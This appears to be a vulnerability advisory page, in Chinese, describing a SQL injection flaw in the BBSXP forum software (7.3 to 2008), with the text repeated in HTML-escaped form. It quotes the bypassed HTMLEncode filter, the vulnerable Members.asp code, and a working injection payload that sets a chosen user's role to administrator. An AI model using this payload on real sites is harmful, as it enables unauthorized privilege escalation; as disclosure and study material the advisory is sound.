VULHUB ™

BBSXP为一款简单的ASP+SQL与ACCESS开发的多风格论坛 目前最新版本为BBSXP2008。 官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射 Function HTMLEncode(fString) fString=Replace(fString,CHR(9),"") fString=Replace(fString,CHR(13),"") fString=Replace(fString,CHR(22),"") fString=Replace(fString,CHR(38),"&") '“&” fString=Replace(fString,CHR(32)," ") '“ ” fString=Replace(fString,CHR(34),""") '“"” fString=Replace(fString,CHR(39),"'") '“'” fString=Replace(fString,CHR(42),"*") '“*” fString=Replace(fString,CHR(44),",") '“,” fString=Replace(fString,CHR(45)&CHR(45),"--") '“–” fString=Replace(fString,CHR(60),"<") '“<” fString=Replace(fString,CHR(62),">") '“>” fString=Replace(fString,CHR(92),"\") '“\” fString=Replace(fString,CHR(59),";") '“;” fString=Replace(fString,CHR(10),"<br>")...

BBSXP为一款简单的ASP+SQL与ACCESS开发的多风格论坛 目前最新版本为BBSXP2008。 官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射 Function HTMLEncode(fString) fString=Replace(fString,CHR(9),&quot;&quot;) fString=Replace(fString,CHR(13),&quot;&quot;) fString=Replace(fString,CHR(22),&quot;&quot;) fString=Replace(fString,CHR(38),&quot;&amp;&quot;) '“&amp;” fString=Replace(fString,CHR(32),&quot; &quot;) '“ ” fString=Replace(fString,CHR(34),&quot;&quot;&quot;) '“&quot;” fString=Replace(fString,CHR(39),&quot;'&quot;) '“'” fString=Replace(fString,CHR(42),&quot;*&quot;) '“*” fString=Replace(fString,CHR(44),&quot;,&quot;) '“,” fString=Replace(fString,CHR(45)&amp;CHR(45),&quot;--&quot;) '“–” fString=Replace(fString,CHR(60),&quot;&lt;&quot;) '“&lt;” fString=Replace(fString,CHR(62),&quot;&gt;&quot;) '“&gt;” fString=Replace(fString,CHR(92),&quot;\&quot;) '“\” fString=Replace(fString,CHR(59),&quot;;&quot;) '“;” fString=Replace(fString,CHR(10),&quot;&lt;br&gt;&quot;) fString=ReplaceText(fString,&quot;([&amp;#])([a-z0-9]*);&quot;,&quot;$1$2;&quot;) if SiteConfig(&quot;BannedText&quot;)&lt;&gt;&quot;&quot; then fString=ReplaceText(fString,&quot;(&quot;&amp;SiteConfig(&quot;BannedText&quot;)&amp;&quot;)&quot;,string(len(&quot;&amp;$1&amp;&quot;),&quot;*&quot;)) if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi fString=escape(fString) fString=ReplaceText(fString,&quot;%u30([A-F][0-F])&quot;,&quot;0$1;&quot;) fString=unescape(fString) end if HTMLEncode=fString End Function Members.asp漏洞文件作为测试: SearchType=HTMLEncode(Request(&quot;SearchType&quot;)) //第8行 SearchText=HTMLEncode(Request(&quot;SearchText&quot;)) SearchRole=RequestInt(&quot;SearchRole&quot;) CurrentAccountStatus=HTMLEncode(Request(&quot;CurrentAccountStatus&quot;)) …… if SearchText&lt;&gt;&quot;&quot; then item=item&amp;&quot; and (&quot;&amp;SearchType&amp;&quot; like '%&quot;&amp;SearchText&amp;&quot;%')&quot; //第18行 …… if CurrentAccountStatus &lt;&gt; &quot;&quot; then item=item&amp;&quot; and UserAccountStatus=&quot;&amp;CurrentAccountStatus&amp;&quot;&quot; //第22行 if item&lt;&gt;&quot;&quot; then item=&quot; where &quot;&amp;mid(item,5) …… TotalCount=Execute(&quot;Select count(UserID) From [&quot;&amp;TablePrefix&amp;&quot;Users]&quot;&amp;item)(0) '获取数据数量 //第54行 看个sql语句： select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0×79006C003600330036003400) 变量userid绕过过滤成功执行了update 同理构造: SearchType=1 SearchText=1 CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0×79006C003600330036003400) BBSXP 7.3-BBSXP2008 sql BBSxp ---------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： <a href=http://www.bbsxp.com/ target=_blank>http://www.bbsxp.com/</a>